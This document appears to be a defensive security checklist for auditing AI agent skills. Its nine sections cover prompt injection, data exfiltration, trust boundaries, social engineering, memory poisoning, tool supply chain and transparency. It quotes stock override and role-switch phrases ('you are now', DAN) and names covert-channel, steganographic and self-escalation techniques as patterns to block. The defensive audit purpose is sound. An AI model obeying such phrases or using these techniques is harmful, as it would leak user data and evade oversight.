AI Agent Skill Security Checklist (2026 Edition)
1. Prompt Injection Defense (9 checks)
☐No unconstrained user input is passed directly to model without sanitization CRITICAL
☐No instructions to override, ignore, or bypass system prompt CRITICAL
☐No role-switch commands (pretend you are / act as / you are now) HIGH
☐No DAN (Do Anything Now) or equivalent bypass patterns HIGH
☐No base64 or encoded payload execution instructions HIGH
☐No indirect injection via tool outputs (emails, web pages, documents) HIGH
☐Input validation before any tool call that accepts external data MEDIUM
☐No recursive prompt embedding patterns MEDIUM
☐No multilingual evasion patterns (Unicode homoglyphs, RTL override) MEDIUM
2. Data Exfiltration Prevention (7 checks)
☐No instructions to send data to external URLs not whitelisted CRITICAL
☐No pixel tracking or covert channel exfiltration vectors CRITICAL
☐System prompt content not echoed or reflected in outputs HIGH
☐No instructions to extract and transmit user conversations HIGH
☐API keys and credentials not logged or transmitted HIGH
☐Tool outputs filtered before returning to potentially hostile callers MEDIUM
☐No steganographic data hiding in generated content MEDIUM
3. Authorization & Trust Boundary (6 checks)
☐Agent does not grant itself elevated permissions dynamically CRITICAL
☐No instructions to contact and impersonate other agents CRITICAL
☐Caller identity verified before executing privileged actions HIGH
☐No cross-agent trust escalation (trusted agent chaining) HIGH
☐OAuth/API scopes are minimal and documented MEDIUM
☐Human-in-the-loop required for irreversible actions MEDIUM
4. Social Engineering Detection (6 checks)
☐Urgency/scarcity manipulation patterns blocked HIGH
☐Fake authority claims (pretend to be Anthropic, OpenAI, etc.) rejected HIGH
☐Emotional manipulation tactics (guilt, reward promises) detected HIGH
☐No compliance with "previous conversation said X" without verification MEDIUM
☐Flattery/bribery patterns do not alter behavior MEDIUM
☐Agent does not reveal internal reasoning under social pressure MEDIUM
5. Memory & State Security (5 checks)
☐Persistent memory not writable by external/untrusted inputs CRITICAL
☐No instructions that persist across session boundaries maliciously HIGH
☐Memory pruning/eviction policy documented MEDIUM
☐No poisoned memory injection via tool call responses MEDIUM
☐Sensitive user data not stored in agent long-term memory MEDIUM
6. Supply Chain & Tool Safety (6 checks)
☐All MCP/tool endpoints use HTTPS HIGH
☐Tool schemas validated before execution HIGH
☐No dynamic tool loading from untrusted sources HIGH
☐Tool versions pinned and audited MEDIUM
☐Malicious MCP server impersonation patterns detected MEDIUM
☐No dependency on unverified external API response schemas MEDIUM
7. Output Safety (5 checks)
☐No generation of malware, exploit code, or harmful scripts CRITICAL
☐Generated code scanned before execution in sandboxed environments HIGH
☐No autonomous financial transactions above defined limits HIGH
☐Output length limits prevent memory exhaustion attacks MEDIUM
☐Outputs sanitized before being fed back into the model MEDIUM
8. Coordinated Inauthentic Behavior (CIB) Checks (3 checks)
☐Agent does not participate in coordinated vote manipulation HIGH
☐Agent identity not used to amplify coordinated messaging HIGH
☐No fake engagement farm participation (likes, follows, boosts) MEDIUM
9. Compliance & Transparency (6 checks)
☐Agent discloses it is an AI when directly asked HIGH
☐No deceptive identity claims (impersonating humans) HIGH
☐Capability boundaries documented and respected MEDIUM
☐Audit log available for all consequential actions MEDIUM
☐Privacy policy for user data handling exists MEDIUM
☐No unauthorized access to systems beyond declared scope MEDIUM